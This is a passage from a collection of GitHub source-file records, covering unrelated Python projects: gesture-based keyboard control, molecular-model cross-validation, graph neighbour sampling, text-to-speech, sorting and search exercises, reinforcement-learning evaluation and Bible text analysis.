classmodel.predict(img_tensor)\n \n predict = np.argmax(prediction)\n if prediction[0][predict] > 0.5 :\n gestureclass = indices[predict]\n \n secondgesture = firstgesture\n firstgesture = predict\n #print(gestureclass)\n \n if secondgesture != firstgesture :\n lengthgesture = 1\n executeflag = True\n else : \n lengthgesture += 1\n \n if lengthgesture > 2 and executeflag == True:\n if secondgesture == 0 and altflag:\n pyautogui.press('tab')\n print('tab')\n \n if secondgesture == 0 and volflag:\n pyautogui.press('volumeup')\n print('volumeup')\n \n if secondgesture == 3 and volflag:\n pyautogui.press('volumedown')\n print('volumedown')\n \n if secondgesture == 3 and not volflag:\n if altflag :\n pyautogui.keyUp('altleft') \n altflag = False\n print('unpressed altleft')\n else :\n pyautogui.keyDown('altleft')\n altflag = True\n print('pressed altleft')\n \n if secondgesture == 2 :\n if volflag : \n volflag = False\n print('unpressed volcontrol')\n else :\n volflag = True\n print('pressed volcontrol')\n altflag = False\n print('unpressed altleft')\n \n if secondgesture == 4 :\n pyautogui.press('playpause')\n print('playpause')\n \n executeflag = False\n \n \n #KeyBoard stuff\n k = cv2.waitKey(1)\n if k == 27:\n break\n elif k == ord('b'): # press 'b' to capture the background\n bgModel = cv2.createBackgroundSubtractorMOG2(0, 50, detectShadows = False)\n isBgCaptured = True\n time.sleep(1)\n print('Background captured')\n elif k == ord('r'): # press 'r' to reset the background\n time.sleep(1)\n bgModel = None\n isBgCaptured = False\n print('Reset background')\n \n framecount += 1\n \n \ncap.release()\ncv2.destroyAllWindows()","repo_name":"sudoRicheek/Gestures-For-3D-Space","sub_path":"Notes And Basic Implementations/Gesture Application Model/Gesture_Application.py","file_name":"Gesture_Application.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"70640924109","text":"\"\"\"\nThe cross validation function for finetuning.\nThis implementation is adapted from\nhttps://github.com/chemprop/chemprop/blob/master/chemprop/train/cross_validate.py\n\"\"\"\nimport os\nimport time\nfrom argparse import Namespace\nfrom logging import Logger\nfrom typing import Tuple\n\nimport numpy as np\n\nfrom grover.util.utils import get_task_names\nfrom grover.util.utils import makedirs\nfrom task.run_evaluation import run_evaluation\nfrom task.train import run_training\n\n\ndef cross_validate(args: Namespace, logger: Logger = None) -> Tuple[float, float]:\n \"\"\"\n k-fold cross validation.\n\n :return: A tuple of mean_score and std_score.\n \"\"\"\n info = logger.info if logger is not None else print\n\n # Initialize relevant variables\n init_seed = args.seed\n save_dir = args.save_dir\n task_names = get_task_names(args.data_path)\n\n # Run training with different random seeds for each fold\n all_scores = []\n time_start = time.strftime(\"%Y_%m_%d_%H_%M_%S\", time.localtime())\n for fold_num in range(args.num_folds):\n info(f'Fold {fold_num}')\n args.seed = init_seed + fold_num\n args.save_dir = os.path.join(save_dir, f'fold_{fold_num}')\n makedirs(args.save_dir)\n if args.parser_name == \"finetune\":\n model_scores = run_training(args, time_start, logger)\n else:\n model_scores = run_evaluation(args, logger)\n all_scores.append(model_scores)\n all_scores = np.array(all_scores)\n\n # Report scores for each fold\n info(f'{args.num_folds}-fold cross validation')\n\n for fold_num, scores in enumerate(all_scores):\n 
info(f'Seed {init_seed + fold_num} ==> test {args.metric} = {np.nanmean(scores):.6f}')\n\n if args.show_individual_scores:\n for task_name, score in zip(task_names, scores):\n info(f'Seed {init_seed + fold_num} ==> test {task_name} {args.metric} = {score:.6f}')\n\n # Report scores across models\n avg_scores = np.nanmean(all_scores, axis=1) # average score for each model across tasks\n mean_score, std_score = np.nanmean(avg_scores), np.nanstd(avg_scores)\n info(f'overall_{args.split_type}_test_{args.metric}={mean_score:.6f}')\n info(f'std={std_score:.6f}')\n\n if args.show_individual_scores:\n for task_num, task_name in enumerate(task_names):\n info(f'Overall test {task_name} {args.metric} = '\n f'{np.nanmean(all_scores[:, task_num]):.6f} +/- {np.nanstd(all_scores[:, task_num]):.6f}')\n\n return mean_score, std_score\n","repo_name":"tencent-ailab/grover","sub_path":"task/cross_validate.py","file_name":"cross_validate.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","stars":284,"dataset":"github-code","pt":"82"} +{"seq_id":"12689953533","text":"import csv\n\nk = 5\nfor i in range(k):\n result = []\n slide_file = open('/home/zhw/Siam_SSA/table/slide_dir.csv', 'r')\n slide_reader = csv.reader(slide_file)\n for idx,(slide_id, folder, label, patch_num, ratio) in enumerate(slide_reader,0):\n if idx%k==i:\n result.append([slide_id, folder, label, patch_num, ratio])\n slide_file.close()\n with open(\"../table/folder_\"+str(i)+\".csv\",\"w\",encoding=\"utf-8\",newline='') as f:\n writer=csv.writer(f)\n writer.writerows(result)\n f.close()","repo_name":"Wang-Zhihua/BSFT_SAG","sub_path":"utils/k_folder.py","file_name":"k_folder.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"33614339116","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Activity',\n fields=[\n ('id', models.AutoField(primary_key=True, auto_created=True, verbose_name='ID', serialize=False)),\n ('user_id', models.PositiveSmallIntegerField(blank=True, null=True)),\n ('act_title', models.CharField(max_length=100)),\n ('act_description', models.CharField(max_length=250)),\n ('created_on', models.DateTimeField(auto_now_add=True)),\n ],\n ),\n migrations.CreateModel(\n name='Stat',\n fields=[\n ('id', models.AutoField(primary_key=True, auto_created=True, verbose_name='ID', serialize=False)),\n ('count', models.PositiveIntegerField(blank=True, null=True)),\n ('date_done', models.DateTimeField(auto_now_add=True)),\n ('activity', models.ForeignKey(to='stats_app.Activity')),\n ],\n ),\n ]\n","repo_name":"TylerKotkin/stats_tracker","sub_path":"stats_app/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"4366593022","text":"import balltree\nimport data_loader\nimport kdtree as deviation_util\nimport mostrated_main as mostrated_util\n\nK = 100\n\nuser_to_movies_matrix_global = None\n\nif __name__ == \"__main__\":\n # Load training data with self/new user ratings\n raw_training_data = data_loader.load_newuser_training_data_from_text()\n\n # Form a user*movie_ratings matrix\n user_to_movies_matrix = 
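# The k_folder.py script above assigns rows to folds by index modulo k; a self-contained
# sketch of the same partition logic on a toy list:
k = 5
rows = ["slide_%d" % n for n in range(12)]
folds = {i: [r for idx, r in enumerate(rows) if idx % k == i] for i in range(k)}
print(folds)  # fold 0 gets rows 0, 5, 10; fold 1 gets rows 1, 6, 11; and so on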
data_loader.build_user_x_movie_matrix(raw_training_data)\n    user_to_movies_matrix_global = user_to_movies_matrix\n\n    # Create an absolute deviation matrix\n    absolute_deviation_matrix = deviation_util.get_deviation_from_mean_matrix(user_to_movies_matrix)\n\n    # Sample the N most commonly rated movies for our Ball tree\n    mostrated_movies = mostrated_util._get_n_most_rated_movies(user_to_movies_matrix, n=100)\n    users_to_most_rated_movies_matrix = user_to_movies_matrix[:, mostrated_movies]\n    most_rated_movies_deviation_matrix = absolute_deviation_matrix[:, mostrated_movies]\n\n    # Do predictions for all movies that are not rated\n    balltree.predict_new_user_rating(most_rated_movies_deviation_matrix, absolute_deviation_matrix, raw_training_data)\n","repo_name":"jaipreet92/netflixprize_hw2","sub_path":"src/newuser_main.py","file_name":"newuser_main.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}{"seq_id":"40472754954","text":"# let's start with CRUD on a grocery list\nmy_list = [\n    {'name' : 'bread', 'price': 0.5, 'quantity' : 20},\n    {'name' : 'milk', 'price': 1, 'quantity' : 30},\n    {'name' : 'butter', 'price': 2, 'quantity' : 10},\n    {'name' : 'yogurt', 'price': 3, 'quantity' : 35},\n]\n\n#create functionality\nitems = list() #it will be a global variable where we store all data\ndef create_items(app_items):\n    global items\n    items = app_items\n\ndef create_item(name, price, quantity):\n    global items\n    items.append({'name' : name, 'price': price, 'quantity' : quantity})\n\n#read functionality\n# def read_item()\n\n","repo_name":"swati121/Python_basics","sub_path":"mvc.py","file_name":"mvc.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}{"seq_id":"35053897995","text":"import numpy as np\n\n\ndef sampling(src_nodes, sample_num, neighbor_table):\n    \"\"\"Sample a fixed number of neighbors for each source node; note that sampling\n    is done with replacement, so when a node has fewer neighbors than the sample\n    size the result will contain duplicate nodes\n    \n    Arguments:\n        src_nodes {list, ndarray} -- list of source nodes\n        sample_num {int} -- number of nodes to sample\n        neighbor_table {dict} -- mapping from a node to its neighbor nodes\n    \n    Returns:\n        np.ndarray -- flattened array of the sampled nodes\n    \"\"\"\n    results = []\n    for sid in src_nodes:\n        # sample with replacement from the node's neighbors\n        res = np.random.choice(neighbor_table[sid], size=(sample_num, ))\n        results.append(res)\n    return np.asarray(results).flatten()\n\n\ndef multihop_sampling(src_nodes, sample_nums, neighbor_table):\n    \"\"\"Multi-hop sampling starting from the source nodes\n    \n    Arguments:\n        src_nodes {list, np.ndarray} -- ids of the source nodes\n        sample_nums {list of int} -- number of neighbors to sample at each hop\n        neighbor_table {dict} -- mapping from a node to its neighbor nodes\n    \n    Returns:\n        [list of ndarray] -- sampling result for each hop\n    \"\"\"\n    sampling_result = [src_nodes]\n    for k, hopk_num in enumerate(sample_nums):\n        hopk_result = sampling(sampling_result[k], hopk_num, neighbor_table)\n        sampling_result.append(hopk_result)\n    return sampling_result\n","repo_name":"FighterLYL/GraphNeuralNetwork","sub_path":"chapter7/sampling.py","file_name":"sampling.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"zh","doc_type":"code","stars":1548,"dataset":"github-code","pt":"82"}{"seq_id":"26617178274","text":"import colorsys\nimport os\nimport pickle\n\nfrom spacy.lang.en import English\nfrom spacy.tokenizer import Tokenizer\n\n\nclass TOCNode:\n    def __init__(self, section_id, level=-1):\n        self.section_id = section_id\n        self.level = level\n        self.children = []\n\n    def add_child(self, child):\n        self.children.append(child)\n    \n    def export(self):\n        if self.section_id > 0:\n            ret = str(self.section_id) 
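# A tiny usage sketch for the neighbor-sampling helpers in sampling.py above, with a
# hand-built adjacency table (illustrative values only):
import numpy as np

neighbor_table = {0: [1, 2], 1: [0], 2: [0, 1]}
hops = multihop_sampling(np.array([0]), sample_nums=[2, 3], neighbor_table=neighbor_table)
# hops[0] is the source node list, hops[1] holds 2 sampled neighbors, and
# hops[2] holds 2 * 3 nodes sampled (with replacement) from those neighbors.
print(hops)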
+ \"\\n\"\n else:\n ret = ''\n for child in self.children:\n ret += str(self.section_id) + '\\t' + child.export()\n return ret\n \n\nclass TableOfContents:\n level2macro = ['title', 'part', 'chapter', 'section', 'subsection', 'subsubsection', 'paragraph', 'subparagraph']\n macro2level = {v:k for k, v in enumerate(level2macro)}\n def __init__(self):\n self.root = TOCNode(0)\n self.current_node = self.root\n self.current_section_id = 0\n\n def add_node(self, macro):\n if macro not in self.macro2level:\n print(f\"Invalid grading: {macro}. Please use one of {', '.join(self.level2macro)}\")\n return\n\n # Determine the depth where the new node should be inserted\n depth = self.macro2level[macro]\n\n # Navigate back to the correct parent for this grading\n while self.current_node.level >= depth:\n self.current_node = self._find_parent(self.current_node)\n\n # Create the new node and make it a child of the current node\n new_node = TOCNode(self.current_section_id+1, depth)\n self.current_node.add_child(new_node)\n\n # Set the current node to the newly added node\n self.current_node = new_node\n self.current_section_id += 1\n\n def _find_parent(self, node):\n \"\"\"Find parent of a node in the tree starting from root. Return None if parent is not found.\"\"\"\n nodes_to_check = [self.root]\n while nodes_to_check:\n current_node = nodes_to_check.pop()\n if node in current_node.children:\n return current_node\n nodes_to_check.extend(current_node.children)\n return None\n \n def get_current_section_id(self):\n assert self.current_node.section_id == self.current_section_id\n return self.current_node.section_id\n\n def export_toc(self):\n s = self.root.export()\n ret = []\n for line in s[:-1].split('\\n'):\n if line:\n head, section_id = line.split('\\t')\n ret.append((int(section_id), int(head)))\n return ret\n\n\ndef generate_rainbow_colors(): # number of color in one color\n if os.path.isfile('data/rainbow_colors_list.pkl'):\n return pickle.load(open('data/rainbow_colors_list.pkl', 'rb'))\n \n all_colors = []\n all_colors_set = set()\n\n # Define steps for hue, saturation, and value\n hue_list = []\n for i in range(0, 359):\n hue_list.append(i/359)\n\n splited_hue_list = [hue_list[i::5] for i in range(5)]\n\n s_v_list = []\n for s in [i for i in range(256, 50, -1)]: \n for v in [i for i in range(256, 50, -1)]:\n s_v_list.append([s/256, v/256])\n #print(\"num of s_v set: \", len(s_v_list))\n\n hue_list = []\n for s_v in s_v_list:\n for sub_hue_list in splited_hue_list:\n for hue in sub_hue_list:\n h = hue; s = s_v[0]; v = s_v[1]\n r, g, b = [int(x * 255) for x in colorsys.hsv_to_rgb(h, s, v)]\n #print((hue/10, s/100, v/100), \"\\t\", (r, g, b))\n if (r, g, b) not in all_colors_set:\n all_colors_set.add((r, g, b))\n all_colors.append((r, g, b))\n #print(\"num of color: \", len(all_colors))\n os.mkdir('data')\n pickle.dump(all_colors, open('data/rainbow_colors_list.pkl', 'wb'))\n return all_colors\n\n\nclass ColorAnnotation:\n def __init__(self) -> None:\n self.color_dict = {}\n self.current_RGB = 0\n self.current_rgb = 0\n self.current_token_number = 0\n self.toc = TableOfContents()\n self.block_num = 0\n self.current_section_id = []\n self.all_color = generate_rainbow_colors()\n \n nlp = English()\n self.tokenizer = Tokenizer(nlp.vocab)\n\n def _get_next_rgb(self):\n assert self.current_rgb < 1331, \"rgb reach upper limit\"\n rgb_tuple = (self.current_rgb//121, self.current_rgb%121//11, self.current_rgb%121%11)\n self.current_rgb += 1\n rgb_string = []\n for rgb in rgb_tuple:\n if rgb > 10:\n raise 
\"color error\"\n elif rgb == 10:\n rgb_string.append(\"1\")\n else:\n rgb_string.append(\"0.%d\" % (rgb))\n return \",\".join(rgb_string)\n \n def _get_next_RGB(self):\n assert self.current_RGB < len(self.all_color), \"RGB reach upper limit\"\n #hex_string = self.int_to_hex_string(self.current_RGB)\n #RGB_tuple = self.hex_to_RGB(hex_string)\n RGB_tuple = self.all_color[self.current_RGB]\n hex_string = self.tuple_to_hex_string(RGB_tuple)\n self.current_RGB += 1\n return str(RGB_tuple)[1:-1], hex_string\n\n def __getitem__(self, key):\n return self.color_dict[key]\n \n def tuple_to_hex_string(self, tup):\n return '#%02x%02x%02x' % tup\n\n def int_to_hex_string(self, num: int):\n return \"#%06x\" % (num)\n\n def hex_to_RGB(self, value: str):\n value = value.lstrip('#')\n lv = len(value)\n return tuple(int(value[i:i + lv // 3], 16) for i in range(0, lv, lv // 3))\n \n def add_existing_color(self, color_str):\n self.color_dict[color_str] = None\n\n def add_annotation_RGB(self, tex_string, annotate):\n RGB_tuple, hex_string = self._get_next_RGB()\n while hex_string in self.color_dict:\n RGB_tuple, hex_string = self._get_next_RGB()\n self.color_dict[hex_string] = {\n \"label\": annotate,\n \"reading\": self.current_token_number,\n \"section\": self.toc.get_current_section_id(),\n \"block\": self.block_num,\n }\n self.current_token_number += 1\n return \"{\\\\color[RGB]{\" + RGB_tuple + \"}\" + tex_string + \"}\"\n\n def add_annotation_rgb(self, tex_string, annotate):\n rgb_tuple = self._get_next_rgb()\n while rgb_tuple in self.color_dict:\n rgb_tuple = self._get_next_rgb()\n self.color_dict[rgb_tuple] = {\n \"label\": annotate,\n \"reading\": self.current_token_number,\n \"section\": self.toc.get_current_section_id(),\n \"block\": self.block_num,\n }\n self.current_token_number += 1\n return \"\\\\colorbox[rgb]{\" + rgb_tuple + \"}{\" + tex_string + \"}\"\n","repo_name":"InsightsNet/texannotate","sub_path":"texannotate/color_annotation.py","file_name":"color_annotation.py","file_ext":"py","file_size_in_byte":6717,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"82"} +{"seq_id":"20729031438","text":"import os\nfrom PyPDF2 import PdfReader\nfrom transformers import SpeechT5Processor, SpeechT5ForTextToSpeech, SpeechT5HifiGan\nfrom datasets import load_dataset\nimport torch\nimport soundfile as sf\nfrom tqdm import tqdm\nimport textwrap\n# Function to extract text from a PDF file\ndef extract_text_from_pdf(pdf_path):\n reader = PdfReader(pdf_path)\n text = ''\n for page in reader.pages:\n text += page.extract_text()\n return text\n\ndef extract_text_from_file(file_path):\n if file_path.endswith('.pdf'):\n reader = PdfReader(file_path)\n text = ''\n for page in reader.pages:\n text += page.extract_text()\n return text\n elif file_path.endswith('.txt'):\n with open(file_path, 'r') as file:\n text = file.read()\n return text\n else:\n raise ValueError(\"Unsupported file type. 
Please provide a .pdf or .txt file.\")\n    \n\ndef text_to_speech_with_speecht5(text, split_into_chunks=True):\n    # Check if using GPU\n    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n    print(\"Using device:\", device)\n\n    # Initialize the processor, model, and vocoder\n    processor = SpeechT5Processor.from_pretrained(\"microsoft/speecht5_tts\")\n    model = SpeechT5ForTextToSpeech.from_pretrained(\"microsoft/speecht5_tts\").to(device)\n    vocoder = SpeechT5HifiGan.from_pretrained(\"microsoft/speecht5_hifigan\").to(device)\n\n    # Load xvector containing speaker's voice characteristics from a dataset\n    embeddings_dataset = load_dataset(\"Matthijs/cmu-arctic-xvectors\", split=\"validation\")\n    speaker_embeddings = torch.tensor(embeddings_dataset[7306][\"xvector\"]).unsqueeze(0).to(device)\n\n    # Split the text into chunks of 250 characters each if split_into_chunks is True\n    text_chunks = textwrap.wrap(text, width=250) if split_into_chunks else [text]\n\n    # Initialize an empty tensor to hold the speech\n    speech = torch.tensor([]).to(device)\n\n    # Process each chunk separately and concatenate the results\n    for chunk in tqdm(text_chunks, desc=\"Processing text chunks\"): # Add progress bar here\n        inputs = processor(text=chunk, return_tensors=\"pt\").to(device)\n        chunk_speech = model.generate_speech(inputs[\"input_ids\"], speaker_embeddings, vocoder=vocoder)\n        if chunk_speech is not None:\n            speech = torch.cat((speech, chunk_speech), dim=0)\n\n    # Write the speech audio to a file\n    sf.write(\"speech1.wav\", speech.cpu().numpy(), samplerate=16000)\n\n    print(\"Conversion completed.\")\n\n# Path to your file\nfile_path = '100west.txt' \n\n# Extract text from file\nfile_text = extract_text_from_file(file_path)\n\n# Convert extracted text to speech, splitting it into chunks\ntext_to_speech_with_speecht5(file_text, split_into_chunks=True)","repo_name":"Tylerbryy/audiobook","sub_path":"test/speecht5.py","file_name":"speecht5.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}{"seq_id":"29416908217","text":"arr = [1, 12, 12, 12, 13, 13, 13, 16, 25, 46]\r\nx = 12\r\n\r\ndef binarySearch(arr, x):\r\n\tlow = 0\r\n\tend = len(arr) - 1\r\n\twhile low <= end:\r\n\t\tmid = (low + end) // 2\r\n\t\tif x == arr[mid]:\r\n\t\t\tprint(arr[mid], mid+1)\r\n\t\t\tbreak\r\n\t\telif x > arr[mid]:\r\n\t\t\tlow = mid + 1\r\n\t\telse:\r\n\t\t\tend = mid - 1\r\n\r\ndef firstnLastElemSortedArray(arr, x):\r\n\tfirstPos = len(arr)\r\n\tlow = 0\r\n\tend = len(arr) - 1\r\n\r\n\twhile low <= end:\r\n\t\tmid = low + (end - low) // 2\r\n\t\tif x <= arr[mid]:\r\n\t\t\tfirstPos = mid\r\n\t\t\tend = mid - 1\r\n\t\telse:\r\n\t\t\tlow = mid + 1\r\n\r\n\treturn firstPos\r\n\r\n# binarySearch(arr, x)\r\n\r\nf = firstnLastElemSortedArray(arr, x)\r\nl = firstnLastElemSortedArray(arr, x+1) - 1\r\n\r\nif (f <= l):\r\n\tprint([f, l])\r\nelse:\r\n\tprint([-1, -1])","repo_name":"rahul-s-bhatt/ProgrammingTraning","sub_path":"Day 24/binarySearch.py","file_name":"binarySearch.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}{"seq_id":"25113419315","text":"def mersort(unslist):\n    \"\"\"Return a sorted list from a list.\n\n    Implementation after pseudocode here:\n    https://en.wikipedia.org/wiki/Merge_sort\n    \"\"\"\n    if len(unslist) <= 1:\n        return unslist\n    lunslist = unslist[:len(unslist)//2]\n    runslist = unslist[len(unslist)//2:]\n\n    # Recursive calls\n    lunslist = 
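# firstnLastElemSortedArray above is a hand-rolled lower bound; the standard library's
# bisect module gives the same first/last occurrence range directly:
from bisect import bisect_left, bisect_right

arr = [1, 12, 12, 12, 13, 13, 13, 16, 25, 46]
x = 12
first = bisect_left(arr, x)
last = bisect_right(arr, x) - 1
print([first, last] if first <= last else [-1, -1])  # [1, 3]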
mersort(lunslist)\n    runslist = mersort(runslist)\n\n    return _merge(lunslist, runslist)\n\n\ndef _merge(llist, rlist):\n    \"\"\"Destructively return an ascending sorted list from two ascending\n    sorted lists.\n\n    Implementation after pseudocode here:\n    https://en.wikipedia.org/wiki/Merge_sort\n    \"\"\"\n    mlist = []\n    llist.reverse()\n    rlist.reverse()\n    while llist and rlist:\n        if llist[-1] <= rlist[-1]:\n            mlist.append(llist.pop())\n        else:\n            mlist.append(rlist.pop())\n    # For stragglers, the following two blocks\n    while llist:\n        mlist.append(llist.pop())\n    while rlist:\n        mlist.append(rlist.pop())\n    return mlist\n","repo_name":"jay-tyler/data-structures","sub_path":"dtypes/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"}{"seq_id":"34893931133","text":"import pandas as pd\nfrom pix_framework.discovery.prioritization.discovery import discover_priority_rules\nfrom pix_framework.io.event_log import EventLogIDs\n\nfrom ..case_attributes.types import CaseAttribute\nfrom .types import PrioritizationRule\n\n\ndef discover_prioritization_rules(\n    log: pd.DataFrame, log_ids: EventLogIDs, case_attributes: list[CaseAttribute]\n) -> list[PrioritizationRule]:\n    \"\"\"\n    Discover prioritization rules from a log.\n    The enabled_time column is required. If it is missing, it will be estimated using the start-time-estimator.\n    \"\"\"\n    case_attribute_names = list(map(lambda x: x.name, case_attributes))\n\n    rules = discover_priority_rules(\n        event_log=log.rename( # Rename columns for hardcoded discovery package\n            {log_ids.enabled_time: \"enabled_time\", log_ids.start_time: \"start_time\", log_ids.resource: \"Resource\"},\n            axis=1,\n        ),\n        attributes=case_attribute_names,\n    )\n\n    rules = list(map(PrioritizationRule.from_prosimos, rules))\n\n    return rules\n","repo_name":"AutomatedProcessImprovement/Simod","sub_path":"src/simod/prioritization/discovery.py","file_name":"discovery.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"63"}{"seq_id":"9748421847","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: SCMSpain\n\"\"\"\nfrom codecs import open\nfrom os import path\n\nfrom setuptools import setup, find_packages\n\nhere = path.abspath(path.dirname(__file__))\nwith open(path.join(here, 'README.rst'), encoding='utf-8') as f:\n    long_description = f.read()\n\nsetup(\n    name='slippinj',\n    version='3.1.0',\n    author='Data Architects SCM Spain',\n    author_email='data.architecture@scmspain.com',\n    packages=find_packages('src'),\n    package_dir={'': 'src'},\n    include_package_data=True,\n    url='https://github.com/scm-spain/slippin-jimmy',\n    description='Tools to generate and deploy Apache Oozie workflows',\n    long_description=long_description,\n    license='GPLv2',\n    install_requires=open('requirements.txt').read().split(),\n    scripts=['scripts/jimmy'],\n    classifiers=[\n        'Topic :: Software Development :: Build Tools',\n        'Topic :: Software Development :: Code Generators',\n        'Programming Language :: Python :: 2',\n        'Programming Language :: Python :: 2.6',\n        'Programming Language :: Python :: 2.7',\n        'License :: OSI Approved :: GNU General Public License v2 (GPLv2)',\n        'Intended Audience :: Developers',\n        'Environment :: Console'\n    ],\n    keywords='oozie workflows code generation emr 
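# A quick check of the mersort/_merge pair above; note that _merge consumes its inputs
# (it pops from both lists), which is why mersort always passes freshly built halves:
print(mersort([5, 1, 4, 2, 3]))  # [1, 2, 3, 4, 5]
print(mersort([]))               # []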
aws'\n)\n","repo_name":"scm-spain/slippin-jimmy","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"63"}{"seq_id":"42681378843","text":"\nimport os\nimport numpy as np\nimport pickle\nimport time\n\nimport ray\nfrom ray.rllib.utils.framework import try_import_torch\nfrom ray.rllib.models import ModelCatalog\nfrom ray.rllib.agents.ppo.ppo import DEFAULT_CONFIG\nfrom ray.rllib.agents.ppo.ppo_torch_policy import PPOTorchPolicy as LoadPolicy\ntorch, nn = try_import_torch()\n\nfrom MACA.env.cannon_reconn_hierarical import CannonReconnHieraricalEnv\nfrom MACA.utils.setting import get_args\nfrom MACA.render.gif_generator import gif_generate\n\nclass Agent():\n    def __init__(self, load_path, observation_space, action_space):\n        self.detector_prep = ModelCatalog.get_preprocessor_for_space(observation_space[0])\n        self.fighter_prep = ModelCatalog.get_preprocessor_for_space(observation_space[1])\n        detector_flat_obs_space = self.detector_prep.observation_space\n        fighter_flat_obs_space = self.fighter_prep.observation_space\n\n        config = DEFAULT_CONFIG.copy()\n        self.args = get_args()\n\n        self.policies = {}\n        self.policies['0'] = LoadPolicy(detector_flat_obs_space, action_space[0], config)\n        self.policies['1'] = LoadPolicy(fighter_flat_obs_space, action_space[1], config)\n\n        objs = pickle.load(open(load_path, \"rb\"))\n        objs = pickle.loads(objs[\"worker\"])\n        state = objs[\"state\"]\n\n        for i in range(0, 2):\n            state[str(i)].pop('_optimizer_variables')\n            self.policies[str(i)].set_weights(state[str(i)])\n\n    def act(self, obs): \n        act_dict = {}\n        \n        for i in range(1, 3):\n            obs_i = self.detector_prep.transform(obs[str(i)])\n            act = self.policies['0'].compute_actions([obs_i], explore=False)\n            act = act[0][0]\n\n            act = np.clip(act, -self.args.fighter.turn_range, self.args.fighter.turn_range)\n            act_dict[str(i)] = act\n\n        for i in range(3, 8):\n            obs_i = self.fighter_prep.transform(obs[str(i)])\n\n            act = self.policies['1'].compute_actions([obs_i], explore=True)\n            direct = act[0][0]\n            attack = act[0][1]['attack'][0]\n\n            direct = np.clip(direct, -self.args.fighter.turn_range, self.args.fighter.turn_range)\n            act_dict[str(i)] = (direct, {'attack': attack})\n\n        return act_dict\n\n\n\ndef main():\n    cr_env = CannonReconnHieraricalEnv({'render': True})\n\n    # set the checkpoint load path here\n    path = ''\n    agent = Agent(path, cr_env.observation_spaces, cr_env.action_spaces)\n    \n    episode = 0\n    while True:\n        state = cr_env.reset()\n        done = False\n        total_reward = 0.\n        episode += 1\n        step = 0\n        total_damage = 0\n        while not done:\n            time.sleep(0.02)\n            action = agent.act(state)\n\n            state, reward, dones, info = cr_env.step(action)\n            cr_env.render(save_pic=True)\n            done = dones['__all__']\n\n            total_reward += sum([reward[str(i)] for i in range(1, 6)])\n            total_damage += sum([item[1] for item in info['1']['ally_damage'].items()])\n\n            step += 1\n\n        print(\"episode: {}, time_step: {}, total_reward: {}, total_damage: {}\".format(episode, step, total_reward, total_damage))\n        gif_generate('demo.gif')\n        break\n\n\nif __name__ == '__main__':\n    main()","repo_name":"simsimiSION/MACA-2D","sub_path":"test_cr_rllib.py","file_name":"test_cr_rllib.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"}{"seq_id":"24233367069","text":"from os import path\nimport pandas as pd\nfrom preprocessing import preprocess\nfrom visualisation.visualisation import freq_barplot, 
unigrams, bigrams, trigrams, sentiment_hist\nfrom ner_flair import ner\n\npd.options.mode.chained_assignment = None  # default='warn'\n\npath_a = 'data/t_kjv.csv' # path to the bible csv\ndf = pd.read_csv(path_a)\ndf.head()\nprint(\"number of rows(verses): \" + format(df.shape[0]))\n\npath_b = 'data/key_english.csv' # path to the book specification csv\ndf_b = pd.read_csv(path_b)\ndf_b.head()\nprint(\"number of rows(books): \" + format(df_b.shape[0]))\n\n# load or create the dataframe after preprocessing\nif path.exists(\"data/out.pkl\"):\n    df = pd.read_pickle(\"data/out.pkl\")\nelse:\n    df = preprocess(df, df_b)\n    df = ner(df)\n\n# run the function calls below to get the visualisation\n\nfreq_barplot(df) # call function to create the frequencies barplot\n\nunigrams(df)\n\nbigrams(df)\n\ntrigrams(df)\n\nsentiment_hist(df)","repo_name":"christoskaparakis/IRTM_Bible","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}{"seq_id":"34333275954","text":"\"\"\"\nExperiment with SVD using SOAP-2 data in the Ca H & K line region.\n\nCreated 2023-05-26 by Tom Loredo\nBased on a script from May 2017, subsequently revised in 2019, 2020, 2021.\n\"\"\"\n\nimport numpy as np\nfrom numpy import *\nimport scipy\nfrom scipy.sparse import linalg\nimport matplotlib as mpl\nfrom matplotlib.pyplot import *\n\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib.collections import PolyCollection\nfrom matplotlib import colors as mcolors\n\nimport colorcet as cc\n\nfrom soap2_data import prep_data, fetch_ca_spec, fetch_full_spec\nfrom outerproduct import OuterProduct\n\n\n# This imports Tom's plotting defaults\ntry:\n    import myplot\n    from myplot import ipy_ion, close_all, csavefig\n    ipy_ion()\n    #myplot.tex_on()\n    csavefig.save = False\nexcept ImportError:\n    ion()\n\n# If having trouble with plots, try switching the backend:\n# 